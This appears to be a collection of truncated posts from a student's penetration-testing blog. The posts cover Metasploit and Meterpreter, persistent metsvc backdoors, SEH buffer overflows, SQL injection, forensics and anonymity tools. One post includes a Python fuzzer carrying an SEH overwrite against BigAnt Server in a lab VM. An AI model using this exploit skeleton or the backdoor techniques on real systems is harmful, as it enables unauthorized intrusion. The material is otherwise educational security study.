Wicd Applet in Backtrack

All of you who had installed backtrack would notice that at default wicd network manager applet won't shown in the panel. Well this won't affect the stability of the system but it would be quite annoying when you have to open it from the main menu everytime you want to connect to a WiFi network.

Follow this steps to fix it.

- Click System > Preferences > Startup Application

Critical System Files

Here are some critical system files that must be protected by applying correct file permission. Applying wrong file permission may result in complete system takeover by the hacker/cracker.

image source : www.linuxsecurity.com

"the quiter you become, the more you are able to hear.."

Security and Attacking Seminar with Onno W. Purbo

Yay, finally Mr. Onno W. Purbo will come to my university to give a seminar about Information Security. Mr Onno W. Purbo is a well known IT Expert in Indonesia. He is an expert that can make something about IT that actually is difficult to be understood become very-very easy to be understood even for beginners. More interesting thing, anything he is talking is about OpenSource. I can say that he's the father of OpenSource in Indonesia. More info about Mr. Onno W. Purbo can be found in wikipedia.

Hex Generator

Finding bad character when developing an exploit is important to make the exploit works properly as we want. In my post about searching bad character I used a perl script to generate a series of hex character start from 00 to FF. Here's other script used to generate it. I found the script at this site. It is written in python language.

Download here.

Script:

#HEX Generator

#http://www.digital-echidna.org

#0x04112011

def gene():

        c=0

        x=0

        hslgen='"'

        while x <= 255:

          hslhex=hex(x)

          if c == 16:

            hslgen=hslgen+'"\n"'

            c=0

          if x <= 16:

            hslgen=hslgen.replace('0x','\\x0')

          hslgen=hslgen+hslhex

          x+=1

          c+=1

        print "\n#Generated with dE HEX Generator"

        print "#http://www.digital-echidna.org\n"

        print hslgen.replace('0x','\\x')+'"\n'

if __name__ == "__main__":

        gene()

"the quieter you become, the more you are able to hear.."

Metasploit ~ Upgrade Command Shell into Meterpreter

As I said in my post about meterpreter. It is an advanced payload that can do a lot of advanced task after a system is exploited. But why if we can only get a normal command shell after exploitation? Its rather difficult of course to do the post exploitation step. But that doesn't matter now, because one of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter shell payload once the sytem has been exploited. This can be done by issuing "sessions -u <selected session>". This is usefull if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks.

Ok, let get started. I'll use a metasploit console version and the system that will be exploited is a Windows XP SP3 machine in my Virtualbox.

Upgrading to BackTrack 5 R2

A while ago, the best linux pentesting distribution, "BackTrack" had released its update that is BackTrack 5 R2.

With a new 3.2.6 kernel, a huge list of new and updated tools and security fixes, BackTrack 5 R2 will provide a more stable and complete penetration testing environment than ever before. For you who doesn't want to reinstall your backtrack to get the R2. You can perform these steps to upgrade your Backtrack 5 R1 to R2. 

Digital Forensic Analysis

After a week of hibernation, its time to move again..  >:)

So, in this post I'll try to perform a simple digital forensic analysis on an image of a floppy disk. You can download it here :

http://www.linuxleo.com/Files/practical.floppy.dd

I use Backtrack OS in this post, because in Linux, there are some basic forensic analysis tools that have been already included.

BASIC LINUX FORENSIC TOOLS

As I told before, linux have been integrated with some basic forensic analysis tools such as :

MP3 File Structure

File structure is something that make up a file. File is the smaller form of a filesystem. A file can't be called "file" when it is not structured. Structure of a file is important to make that file readable because when it is not properly structurized I bet the system won't be able to read it. And I think there's also a standarization of a file structure, so a pdf file named A will have the same structure as the B,C,D or the other pdf files. The file structure of each filetype is also different. An .avi files will have different file structure with a .doc file. 

In this post I'll try to explain about the structure of an mp3 file.   :)

Who don't know MP3? MP3 or to be more specific, MPEG-1 or MPEG-2 Audio Layer III, is a patented digital audio encoding format using a form of lossy data compression. It is a common digital audio format used widely in the world. When we talk about mp3, it cannot detached from music. I think everyday we always listen to music. And I think you already know, most of the music is encoded with this format.

The Magic Number

Hoho, In this post I'll explain a thing called "Magic Number". Can you guess already what it is? Some kind of number that have a magical spell in it? some kind of magic trick that use numbers as its media? or the others? 

Unfortunately, "magic number" in this post is not a thing related to magic itself literally. This magic number is a thing related about a file format. Originally, this kind of term was used for a specific set of 2-byte identifiers at the beginning of a file, but since any undecoded binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. Identify what? to identify a file format of course.

What is Unallocated Space?

When you're installing an operating system on a new harddisk, do you notice that the installer said that our disk status is Unallocated? Or when you want to divide a harddisk into two or more partition, after the split the newly created partition also in the "Unallocated" status. So what is this unallocated called thing?

Unallocated space, or in the other word "free space", is logical space on a hard drive that can be used by the system to put files on. Unallocated space is the opposite of "allocated" space, which means a place on the hard drive where there's already files written or stored in it. Unallocated space is different from Slack space. The difference, in the unallocated space the system can put files in it, where in the slack space the system can't put any files in it. Simple right?  :)

Slack Space

Again, in this post I'll try to explain a thing that related to Computer Digital Forensic that is Slack Space. 

In a Storage Device when a file is saved, it is stored in the beginning of a cluster. Cluster itself is like a directory in the storage. It consist of some sectors. Imagine a House fully contained with 50 cupboards that have 4 drawers each..
Get it?  :D
Lets say that this house is the harddisk, the cupboards is the cluster, while the drawers on each cupboard is the sector. So, we can say that this harddisk have 50 cluster and 4 sector on each cluster.
cmiiw..  :)

File System at Glance

When we want to learn about Computer Forensic, File System can't be excluded from our learning material. So, in this post I'll explain a little about File System.

File system is a method, how to deal with files on a computer. How the data organized, stored, updated, modified, as well as manage the available free space on the storage media. The type of a hardware filesystem is usually adjusted with the characteristics of the storage device. So, the filesystem of the Harddisk is usually different with the filesystem of a Flashdisk or a Floppydisk. Another adjustment is including an Operating System as its parameter. Windows filesystem (which usually is FAT or NTFS), is different with Linux filesystem (ext2,ext3,ext4), as well as Mac filesystem. Still, nowadays an Operating System able to use more than one filesystem.

MBR ~ Master Boot Record

Computer Forensic mostly dealing with a storage device like Flashdisk, Harddisk, CD, DVD, RAM, etc. There are two type of storage, volatile and non volatile. Dealing with volatile storage device like RAM is more difficult because when the Computer is turned off, the data inside will disappear and some evidence maybe would lost too. Dealing with non volatile memory like Flashdisk or Harddisk isn't easy too. False method will make an evidence found on the memory won't be valid anymore.

In the Harddisk, there is something called MBR or Master Boot Record. MBR contain a series of code which make the harddisk can boot the system. IBM is the one who make it well known by the world. Usually, MBR located in the first sector of the Harddisk. Some of MBR task are :

1. Record the partition table on the system, which contains the details of the partition of a storage device on the system. 

2. Bootstrapping an operating system. 

3. Identify individual storage media.

Advanced Web Application Hacking

Nowadays, most people especially engineers have a website. They usually use it to share their activity, show their works, make a portofolio, etc. But, little people concern about the security of their website. They usually won't do something about the security of their website before it is attacked by hacker. They don't know the importance of their web security before someone breaks into it.

In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it here. The installation is there too.

- Start up your apache and mysql.

Interact With Metsvc Backdoor

To interact with the meterpreter backdoor service we've created before, we can use a multi_handler with a windows/metsvc_bind_tcp payload to connect with the backdoor. 

To remind you again, this backdoor require no authentication to connect. So it is a dangerous backdoor to use since anyone can use it too.

Ok, here's a way to connect to the metsvc backdoor we've created before.

- Load up your msfconsole

Meterpreter Backdoor

Again, meterpreter is the most convenient payload to use. Part of the hacking framework is creating a backdoor for later use so we don't need to go through normal attack to access the system again. Meterpreter can make a backdoor on a system that we've successfully exploit. Make us can get a meterpreter shell anytime we want. Cool right..  :D

There's a module called "metsvc" that will create a persistent backdoor on a system. This module is created by Alexander Sotirov. Read more here http://www.phreedom.org/software/metsvc/. One thing to keep in mind, metsvc requires no authentication. This means anyone can access our backdoor if they know the port that we use. This is not a good thing if you are performing a real pentest.

Meterpreter ~ Basic Usage

Here's some basic meterpreter commands you can practice..  :)

- help

Display all commands that can be executed by meterpreter.

- background

Return to the msf shell and send the current meterpreter session into background. To interact with it again, just type 'sessions -i [id]'

Meterpreter

Meterpreter (meta-interpreter), is an advanced payload included in the Metasploit Framework. In my opinion this is the best payload ever. It can upload/download victim's files, read stored password hashes, keylogging, and even run a vnc server on the victim's machine. 

Meterpreter compatible with most of the exploit and auxiliary on metasploit. Making it the most sophisticated and the most used payload by pentesters and hackers. The way that it accomplishes this is by allowing exploit developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. 

Exploit Combo ~ BeeF & Metasploit

Exploitation is so much fun and exciting for me..  :D

In this post I'll try to combine BeeF and Metasploit to create an Attack. BeeF, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my XP SP3 Machine.

Lets get started..  >:)

- First, start your BeeF-ng services..

MSFpayload & MSFencode

Again, in this post I'll explain some of the metasploit features..  :)

- MsfPayload

msfpayload is the metasploit tool to generate a payload for the exploit. Its function is the same as msfweb that I use in my other posts, but this tool is in console, so its rather difficult for newbies to use. But with regular training, this tool is better than msfweb because it greatly save time and RAM space. 

# msfpayload -h

Social Engineering ~ Definition and Tool

In this post I'll explain about the definition of social engineering and the tools to do it. Although its only a little and not in detail, but I think its enough to help you understand better about Social Engineering.

Lets talk about vulnerability first.

Vulnerability, is a weak point that exist on a system. This vulnerability is not only on the hardware and software, but also on the environment, the network and also the administrator/user. Social Engineering is the technique to attack the human vulnerability, usually the biggest vulnerability that exist on the human is the Low Security Awareness. 

Working With Metasploit Auxiliary

Metasploit is a powerfull framework to do an exploitation. There are a lot of thing we can do with it. Exploits, Payloads, Encoders, and Auxiliaries are ready to be used to do an exploitation. In this post I'll explain a little about metasploit auxiliary and how to use it. 

Auxiliary is a set of tools developed to perform reconnaissance like scanning, sniffing, fingerprinting and the other security tasks. With this auxiliary, we can use metasploit to do the earlier hacking framework without other tools, just metasploit and its auxiliary and the other modules, this will make our security tasks far more easier.

So, here's an example the use of an auxiliary..

Linux Exploitation : Stack Overflow

After a week full of Windows exploitation. This time I'll try to explain about Linux Based Stack Overflow Exploitation. There are no big difference between exploitation in windows and in linux. We still have to deal with memory registers, addresses, and payload.

Ok, lets begin..

- First, we must turn off the ASLR on Linux. ASLR stands for Address Space Layout Randomization, it is a computer security method that can make the positions of key data areas to be randomly positioned. Usually including the base of the executable and position libraries, heap, and stack in a process's address space. To turn it off, execute this command.

SEH Based Buffer Overflow : Elecard MPEG Player

In this post I'll try to exploit a software called Elecard MPEG Player that have a SEH Protection (Again??)  :D

Exploit a software is fun if we know the technique and can be very frustrating if we can't exploit it even after hours of struggle.

Okay, Lets get started.

- Install the software on the machine.

- Lets open a file to see what file extention is supported by this software.

SEH Based Buffer Overflow : File Sharing Wizard

In this post, I'll try to exploit a software called "File Sharing Wizard" version 1.5.0 build 26-8-2008. This software have a SEH protection. So, I'll use the technique like when I exploit BigAnt server. 

Lets get started..  

- First thing to do is install the software on your xp machine.

- This is a file server, so we will use a remote exploit for our fuzzer.

- Searching what port this software is running.

Search for "Bad Characters"

In my post about exploiting BigAnt server, when generating payload I'm entering 0x20 and 0x25 as bad character. How to search for a bad character in the application that will be exploited? Here's the way to do it. The application that will be used is still BigAnt server, but I think the method to find the bad character is the same in all aplication. This knowledge is essential because without entering the right bad character, our payload won't work properly as we wish.

Lets begin..  :D

- Use this fuzzer as the starting point.

Fuzzer:

#!/usr/bin/python
import socket
address="192.168.56.2"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")

More About SEH and SafeSEH

As explained before, SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forcing hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU also can be controlled easily like in the Direct Return Exploitation.

SEH Based Buffer Overflow - BigAnt Server

This time, I'll try to explain how to exploit a software that have a SEH protection on its system called BigAnt Server. SEH is an exception handler to protect the EIP to be overflowed by the abnormal flow on the software. This will force us to use different attack vector and technique because if we use the same technique as in the Direct Return Exploit the attack won't work because of SEH.

BigAnt server is an Internet Messenger server. The version of the software that used in this post is 2.52 Service Pack 5.

Lets get started..  >:D

Buffer Overflow - VUPlayer

Again, in this post I will try to exploit a software using the Buffer Overflow technique. The software is called VUPlayer.

Lets do some testing first to make the software crashed. That will be my attack vector. 

Alhamdulillah, this morning I'm succeeded to make the software crashed in the first try. Here's what I did.

- Of course installing VUPlayer in my Windows XP machine.

- Okay, I want to try adding url. (of course the url is not the valid one..  :P  )

- Making 1000 'A' character in notepad.

Reverse Engineering Mini-Stream RM-MP3 Converter

Reverse engineering is an interesting advanced hacking technique to be learned. Once we knew the technique I'm sure that when there is a bug in a program, although the bug is only a little, we can exploit that vulnerable point to hack our target machine. 

So, at the other post we've already do a reverse engineering technique against WarFTP. In this post we will try to do it with a software called Mini-Stream RM-MP3 Converter.

Lets get started.

- First, Install the software on your XP machine.

- I'll search for some information in www.exploit-db.com/search.

Reverse Engineering WarFTP

Finally, after preparing OllyDbg and WarFTP on our machine, its time to put reverse engineering in action.

What I do in this post is based on my sensei's book titled "Harmless Hacking". Lets get started. 

- Start your Windows XP machine.

- Open WarFTP and start its service by clicking Properties > Start Service

Installing WarFTP for Reverse Engineering

The target for my first reverse engineering is a software called WarFTP given by my sensei. In the other post we've setup the debugger program, now lets install the software on the machine. (If you want to use WarFTP like this post you can download here)

1. Again, I'll transfer the WarFTP master to my machine using web server.

2. Download the master

Setup OllyDbg

Ok, my sensei give me a task to do a Reverse Engineering on a software called WarFTP. Before do that I must install OllyDbg first to debug the software. I'm using Windows XP SP3 in VirtualBox. So, lets get started.

1. Start up your XP machine.

2. I'll transfer the OllyDbg master to my machine using web server. So I put the master into /var/www/files on my backtrack. (If you haven't downloaded the master, you can go here)

Introduction to OllyDbg

In this post, we've learned about reverse engineering. What we will talk now is one of the tool used for that called OllyDbg.

Before discussing OllyDbg, we must know what is debugging. Debugging is a structured process to find and reduce the number of bugs or defects in a computer program and repair it. When there are a bug in a system, especially when there are lots of subsystem in it will make the debugging process become harder because a changes in one may cause bugs appear in the other.

Reverse Engineering at Glance

Lets talk about Reverse Engineering briefly, because this is also important thing to know when you want to become an expert hacker. 

Reverse Engineering is an activity to discover the material how a something is made, how something is works and what is its purpose. In the other word, discovering the technological principles of something by analizing its structure, function and operation. Usually the thing that want to be reverse engineered is taken apart from its original form then analyze each part one by one throughly.

Introduction to SQL Injection & Blind SQL Injection

MySQL is one of the most famous database server used by many people in the world.  However, many administrator don't set the MySQL correctly and that will make the database can be Injected by a hacker.

SQL Injection is a hacking technique that utilize the low security settings or poorly designed database on a server. SQL Injection usually done by inserting a series of code to the url or  a form of a website. The vulnerability appear when the user input is not filtered correctly, so when the user insert a SQL character into a form, that code will be executed by the database server. To know where is a site is injectable or not, simply put ' character after the url of the site. If an error appear like "You have an error in your SQL syntax, bla bla bla..." then the site is 99% injectable.

Buffer Overflow : Direct Return & SEH Based

At my other post we've known a little thing about buffer overflow. Now we will talk two cases that happened when we do a Buffer Overflow that is Direct Return Exploit and SEH Based Exploit and whats the difference between those two.

- Direct Return Exploit

Direct return exploit happened to a program that can't handle an exception. A condition where an application trying to execute a code outside its normal work cycle. As the results, when an application that can't handle an exeption buffer overflowed, the EIP registered in the buffer memory will directly overwritten by the rest of the data that we use to overflow the application.

Buffer Overflow at Glance

Buffer overflow is one of hacking technique to gain root/adminstrator privileges access by exploiting the weak application vulnerabilities installed/running in a system. How can this be done? The hacker make an application/program that will make the buffer memories provided by the system for the target application will overload and then overwrite the other buffer.

Introduction to Buffer Overflow : CPU Register

 If we want to master the Buffer Overflow technique, first we must have a knowledge in CPU Register. Register is the part of the processor's memory that can be accessed with a high speed and always used by microprocessor as the medium to do its work.

An x86 based CPU used 8 register : EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP. Each of them designed for a specific job that make the CPU process the information eficiently.

1. EAX Register

Used to perform calculations and store the value returned from the function call. Basic operations such ass add, subtract, and compare is optimized in EAX Register. Special operations such as multiplication and divide are done by EAX Register.

Metasploit at Glance

There're a lot of explanation of metasploit out there. Buy I'll try to explain it with my point of view.

Metasploit is the name of a project and a framework. 
a. Metasploit Project
Metasploit   project   is   an   open-source,   computer   security   project   that provides information about security vulnerabilities and aids in penetration testing. Some of its sub-projects are the famous metasploit framework, opcode database, shellcode archive, and security research. Simply, metasploit project is the procjet or activity around computer security section and the one that created metasploit framework.

b. Metasploit Framework

Vulnerability at Glance

Lets talk about Vulnerability..

Wikipedia : 
"In computer  security,  a vulnerability  is a weakness which allows an attacker to  reduce a system's information assurance. Vulnerability is the intersection of three elements : a system  susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness.   In this frame,  vulnerability  is also known as the attack surface."

ISO 27005 :

Information Gathering Task

Here's my link.

http://www.mediafire.com/?kucf47iwatvrr57

Bypassing Login Screen

Ok, Lets try to bypass the login screen on my testing webpage located in /var/www/fbip.

1. Open the browser and type in the address bar

localhost/fbip

A simple, ugly web page will appear.

DVWA : SQL Injection

DVWA(Damn Vulnurable Web Application) is a web that have a lot of security issues inside. 

Lets try to Inject it with sqlmap.

1. Start your mysql and apache2 service.

# service apache2 start

# service mysql start

2. Open your browser and type the url of your dvwa.

Introduction to TOR and Proxychains

Lets talk about TOR and Proxychains. These two things are a great tools to make us stay "Anonymous" while hacking.  

TOR first..

Tor is a virtual network tunnels that allows Internet user to greatly imrove their privcy and security while surfing on the Internet. Actually, tor was designed, implemented, and deployed as a third-generation onion routing project of the U.S Naval Research Laboratory. But the information about it is leaked and now everyone can use it on a wide variety of purposes. Originally developed with the U.S. Navy in mind for the purpose of protecting government communications.

Why do we need TOR?

Introduction to Google Hacking

Google hacking is a hacking technique that utilizes google search and another google services to find security holes or vulnerabilities on a site's configuration and any information on it.

Google hacking can be done by using advanced operators in the Google search bar to locate specific strings of text within search results. Simply, any advanced operators provided by google can be used to help us to find a vulnurable sites. 

Here's an explanation of google hacking from wikipedia : 

"Google hacking is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use.

Introduction to Shodan

You know search engine like Google, Yahoo or Bing right?

Shodan is like that. It is also a search engine. The difference between shodan and usual search-engine is the thing that searched. While google,yahoo or bing is good to search for websites, shodan is also a great search engine to find a specific computer (routers, servers, etc.) using various filters to put your searching into more specific.

Shodan lets you find servers or routers easily by using the search bar on its homepage. It can find what web are running what (example, web with ip 114.166.242.76 is running apache version 2.3.3)

Great search engine isn't it?